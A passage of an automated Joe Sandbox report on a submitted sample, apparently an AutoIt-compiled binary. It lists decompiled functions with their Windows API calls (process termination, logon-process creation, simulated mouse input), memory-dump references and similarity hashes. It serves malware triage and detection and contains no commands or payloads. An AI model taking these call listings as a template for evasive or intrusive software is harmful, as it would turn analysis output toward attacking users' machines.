                                            • VariantClear.OLEAUT32(00000013), ref: 00E6F469
                                            • VariantClear.OLEAUT32(00000000), ref: 00E6F4C4
                                            • _memmove.LIBCMT ref: 00E6F4EE
                                            • VariantClear.OLEAUT32(?), ref: 00E6F53B
                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E6F569
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                            • String ID:
                                            • API String ID: 1101466143-0
                                            • Opcode ID: 73d2fda9e709dc4a6122194294f3da18529ddc80212cf1af2ad66f6a84d5b3ac
                                            • Instruction ID: 1c0e2e0c7d75b0b1c393bf472fef9c49ddeee6fd6f2d41d118be0cdf438fdeb9
                                            • Opcode Fuzzy Hash: 73d2fda9e709dc4a6122194294f3da18529ddc80212cf1af2ad66f6a84d5b3ac
                                            • Instruction Fuzzy Hash: 97513CB5A00209DFCB14CF58E884AAAB7F8FF4C354B15856AE959EB311D730E951CFA0
                                            Function 00E726F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E72747
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E72792
                                            • IsMenu.USER32(00000000), ref: 00E727B2
                                            • CreatePopupMenu.USER32 ref: 00E727E6
                                            • GetMenuItemCount.USER32(000000FF), ref: 00E72844
                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E72875
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                            • String ID:
                                            • API String ID: 3311875123-0
                                            • Opcode ID: a868d134e4b51eb5e9b471f61b918da2c2669cf1dd13f329f179dc6213298fee
                                            • Instruction ID: 1491267ef02de2299d92f5a0b5e7f0639ecfb9c26209d12173f8eca78b1613bd
                                            • Opcode Fuzzy Hash: a868d134e4b51eb5e9b471f61b918da2c2669cf1dd13f329f179dc6213298fee
                                            • Instruction Fuzzy Hash: 1151A270A00205DFEF28CF64D888BADBBF4AF44318F10915EE619BB291D7718944CB52
                                            Function 00E11765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E1179A
                                            • GetWindowRect.USER32(?,?), ref: 00E117FE
                                            • ScreenToClient.USER32(?,?), ref: 00E1181B
                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E1182C
                                            • EndPaint.USER32(?,?), ref: 00E11876
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                            • String ID:
                                            • API String ID: 1827037458-0
                                            • Opcode ID: 924221aabb767efe5b9afb4ce38992c7d3c24861bdf9cf85cfff4ad77a6b47dd
                                            • Instruction ID: 2cbee0efb0ac1a45b9bd5570cea7baf63b9676e530dc990f889b2783ff747d81
                                            • Opcode Fuzzy Hash: 924221aabb767efe5b9afb4ce38992c7d3c24861bdf9cf85cfff4ad77a6b47dd
                                            • Instruction Fuzzy Hash: 1741A3705043019FD710DF25DC84BB67BF8EB49724F14466AF6A4A61A1C7309889EB61
                                            Function 00E9B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(00ED67B0,00000000,01044E28,?,?,00ED67B0,?,00E9B862,?,?), ref: 00E9B9CC
                                            • EnableWindow.USER32(00000000,00000000), ref: 00E9B9F0
                                            • ShowWindow.USER32(00ED67B0,00000000,01044E28,?,?,00ED67B0,?,00E9B862,?,?), ref: 00E9BA50
                                            • ShowWindow.USER32(00000000,00000004,?,00E9B862,?,?), ref: 00E9BA62
                                            • EnableWindow.USER32(00000000,00000001), ref: 00E9BA86
                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E9BAA9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Show$Enable$MessageSend
                                            • String ID:
                                            • API String ID: 642888154-0
                                            • Opcode ID: e89172b3279e45980f71a9a0e1e6862cf24a4e0c887e14dc592c3544135d8f69
                                            • Instruction ID: 1d14e0e513a3c79e338b784872bf3272dd7970f9cc960ccf980e4c89c4de7cf2
                                            • Opcode Fuzzy Hash: e89172b3279e45980f71a9a0e1e6862cf24a4e0c887e14dc592c3544135d8f69
                                            • Instruction Fuzzy Hash: A1415030600241AFDF21CF59E689BD57BE0BB45318F1852BAEA58AF2A2C771EC45CB51
                                            Function 00E873B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00E85134,?,?,00000000,00000001), ref: 00E873BF
                                              • Part of subcall function 00E83C94: GetWindowRect.USER32(?,?), ref: 00E83CA7
                                            • GetDesktopWindow.USER32 ref: 00E873E9
                                            • GetWindowRect.USER32(00000000), ref: 00E873F0
                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E87422
                                              • Part of subcall function 00E754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E7555E
                                            • GetCursorPos.USER32(?), ref: 00E8744E
                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E874AC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                            • String ID:
                                            • API String ID: 4137160315-0
                                            • Opcode ID: 7cfea31ba7087cd138d35e070e76f8fe666695429380a845f55658a57bbd6d0e
                                            • Instruction ID: 25f843d69ed8a96c33629de606bfdd21734d9146ff0d587930c06053a6bf39e4
                                            • Opcode Fuzzy Hash: 7cfea31ba7087cd138d35e070e76f8fe666695429380a845f55658a57bbd6d0e
                                            • Instruction Fuzzy Hash: C331F432508306AFC720EF14D849E9BBBE9FF88304F10091AF89DE7191C670E948CB92
                                            Function 00E68D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E685F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E68608
                                              • Part of subcall function 00E685F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E68612
                                              • Part of subcall function 00E685F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E68621
                                              • Part of subcall function 00E685F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E68628
                                              • Part of subcall function 00E685F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E6863E
                                            • GetLengthSid.ADVAPI32(?,00000000,00E68977), ref: 00E68DAC
                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E68DB8
                                            • HeapAlloc.KERNEL32(00000000), ref: 00E68DBF
                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E68DD8
                                            • GetProcessHeap.KERNEL32(00000000,00000000,00E68977), ref: 00E68DEC
                                            • HeapFree.KERNEL32(00000000), ref: 00E68DF3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                            • String ID:
                                            • API String ID: 3008561057-0
                                            • Opcode ID: f062a46358f273452c3883be380a3e65e199e6ba110783c22f806e1e823c2a90
                                            • Instruction ID: 5b9b79b8e9ad94ea1bdce2f54e907173c133ddaa2e2d6a7389657899c006a3cc
                                            • Opcode Fuzzy Hash: f062a46358f273452c3883be380a3e65e199e6ba110783c22f806e1e823c2a90
                                            • Instruction Fuzzy Hash: C511E131941604FFDB108F65ED08BAE77ADEF41399F10522AE845F3251CB319D04CB60
                                            Function 00E68AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E68B2A
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00E68B31
                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E68B40
                                            • CloseHandle.KERNEL32(00000004), ref: 00E68B4B
                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E68B7A
                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E68B8E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                            • String ID:
                                            • API String ID: 1413079979-0
                                            • Opcode ID: 8e781a113d429d5326ea4c298f0d1194038f308b84c78b43b79fab9283a66fb4
                                            • Instruction ID: 05b0bcccbf46f7a833059e645baae52c6bd7352d8797a72d6a7e166a270b3c80
                                            • Opcode Fuzzy Hash: 8e781a113d429d5326ea4c298f0d1194038f308b84c78b43b79fab9283a66fb4
                                            • Instruction Fuzzy Hash: E61159B6540209AFDF018FA5ED49FDE7BA9EF08348F045166FE04B2160C7768D64EB60
                                            Function 00E9C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E1134D
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1135C
                                              • Part of subcall function 00E112F3: BeginPath.GDI32(?), ref: 00E11373
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1139C
                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E9C1C4
                                            • LineTo.GDI32(00000000,00000003,?), ref: 00E9C1D8
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E9C1E6
                                            • LineTo.GDI32(00000000,00000000,?), ref: 00E9C1F6
                                            • EndPath.GDI32(00000000), ref: 00E9C206
                                            • StrokePath.GDI32(00000000), ref: 00E9C216
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                            • String ID:
                                            • API String ID: 43455801-0
                                            • Opcode ID: 73a8b5cfdd16b5a9aa4d20a6a830d938b556130ee1d1412e62e224d4cdc545e9
                                            • Instruction ID: 97dc35167deb0713c42582c5bd7641bc49b3d772e59e295726cb2fe08213bbd7
                                            • Opcode Fuzzy Hash: 73a8b5cfdd16b5a9aa4d20a6a830d938b556130ee1d1412e62e224d4cdc545e9
                                            • Instruction Fuzzy Hash: EE111E7640014DBFDF119F91EC88EDA7FADEB08354F148022FA18A6171C7719D59DBA0
                                            Function 00E303A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E303D3
                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E303DB
                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E303E6
                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E303F1
                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E303F9
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E30401
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Virtual
                                            • String ID:
                                            • API String ID: 4278518827-0
                                            • Opcode ID: c7237fae74972b7e50e7a9159b835805d6c18173b7446042dccf8ea7c21acafb
                                            • Instruction ID: 9c3ed25911360e780abc56fed22447029bc0ecfea671143a5cb91dbd923d760a
                                            • Opcode Fuzzy Hash: c7237fae74972b7e50e7a9159b835805d6c18173b7446042dccf8ea7c21acafb
                                            • Instruction Fuzzy Hash: 340148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15887942C7B5A868CBE5
                                            Function 00E7568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E7569B
                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E756B1
                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00E756C0
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E756CF
                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E756D9
                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E756E0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                            • String ID:
                                            • API String ID: 839392675-0
                                            • Opcode ID: b817c9c989bff4c1b57742144d8a186cbb2aae7e5aa8e95c3f7ba3f26de9d48a
                                            • Instruction ID: 4ac2d774c53ec30f96d9d51b50eed68059e41162b09d0b54cb0f85ea3e9ac7d1
                                            • Opcode Fuzzy Hash: b817c9c989bff4c1b57742144d8a186cbb2aae7e5aa8e95c3f7ba3f26de9d48a
                                            • Instruction Fuzzy Hash: E8F01D32641259BFE7215BA39C0DEAF7A7CEBC6B11F00016BFA05E105196A15A0586F5
                                            Function 00E774D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,?), ref: 00E774E5
                                            • EnterCriticalSection.KERNEL32(?,?,00E21044,?,?), ref: 00E774F6
                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00E21044,?,?), ref: 00E77503
                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E21044,?,?), ref: 00E77510
                                              • Part of subcall function 00E76ED7: CloseHandle.KERNEL32(00000000,?,00E7751D,?,00E21044,?,?), ref: 00E76EE1
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E77523
                                            • LeaveCriticalSection.KERNEL32(?,?,00E21044,?,?), ref: 00E7752A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3495660284-0
                                            • Opcode ID: 256949295fba9baab8159b3bfd584028f32b17ca5a8967cdb53ece3ddb73c8af
                                            • Instruction ID: dc8c91fce76d6373a9ea8072daed5c4acb26a00c4e42ac8ac0ecc667203b6e03
                                            • Opcode Fuzzy Hash: 256949295fba9baab8159b3bfd584028f32b17ca5a8967cdb53ece3ddb73c8af
                                            • Instruction Fuzzy Hash: 09F03A3A540612AFDB111B65EC88AEA772AEF45306B101533F602F10B1CB756915CBA0
                                            Function 00E68E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E68E7F
                                            • UnloadUserProfile.USERENV(?,?), ref: 00E68E8B
                                            • CloseHandle.KERNEL32(?), ref: 00E68E94
                                            • CloseHandle.KERNEL32(?), ref: 00E68E9C
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E68EA5
                                            • HeapFree.KERNEL32(00000000), ref: 00E68EAC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                            • String ID:
                                            • API String ID: 146765662-0
                                            • Opcode ID: e6ac075cfa2ccfa7703110dd1bce7e3025400b9bce79d129bf1a8cf976f0715e
                                            • Instruction ID: 2ec9df965f067492369dde7636271f4f0d57558738c08344969cc14dfb079c49
                                            • Opcode Fuzzy Hash: e6ac075cfa2ccfa7703110dd1bce7e3025400b9bce79d129bf1a8cf976f0715e
                                            • Instruction Fuzzy Hash: 1AE0C236004001FFDA015FF3EC0C90ABB69FB89322B208233F219E1071CB329428DB90
                                            Function 00E67A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                            Download Yara Rule
                                            APIs
                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00EA2C7C,?), ref: 00E67C32
                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00EA2C7C,?), ref: 00E67C4A
                                            • CLSIDFromProgID.OLE32(?,?,00000000,00E9FB80,000000FF,?,00000000,00000800,00000000,?,00EA2C7C,?), ref: 00E67C6F
                                            • _memcmp.LIBCMT ref: 00E67C90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FromProg$FreeTask_memcmp
                                            • String ID: ,,
                                            • API String ID: 314563124-1556401989
                                            • Opcode ID: 8189a946ccacd8600dda5388af67789a138749b41e58c09e2bd0cf0d9aaf4ab6
                                            • Instruction ID: 577fca4c9cef824b088278c79be515b1e83c1dd1dee5fd4a2d3bb93412030aa7
                                            • Opcode Fuzzy Hash: 8189a946ccacd8600dda5388af67789a138749b41e58c09e2bd0cf0d9aaf4ab6
                                            • Instruction Fuzzy Hash: 12813B71A00109EFCB04DF94C884DEEB7B9FF89359F204198E546BB250DB71AE06CB60
                                            Function 00E88902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00E88928
                                            • CharUpperBuffW.USER32(?,?), ref: 00E88A37
                                            • VariantClear.OLEAUT32(?), ref: 00E88BAF
                                              • Part of subcall function 00E77804: VariantInit.OLEAUT32(00000000), ref: 00E77844
                                              • Part of subcall function 00E77804: VariantCopy.OLEAUT32(00000000,?), ref: 00E7784D
                                              • Part of subcall function 00E77804: VariantClear.OLEAUT32(00000000), ref: 00E77859
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                            • API String ID: 4237274167-1221869570
                                            • Opcode ID: b5dc3f6072e4dcd524420a62d26f71a68b5ca7dded7c1fd8613a582acc434fb9
                                            • Instruction ID: 40dee2f761dd86a30d3f3c66d3639b3ae0b225cd9fff6e6c84b138e1da7a82c1
                                            • Opcode Fuzzy Hash: b5dc3f6072e4dcd524420a62d26f71a68b5ca7dded7c1fd8613a582acc434fb9
                                            • Instruction Fuzzy Hash: 94919F756083019FC710EF24C5849AABBE4EFC8344F04596EF89EAB362DB31E945CB52
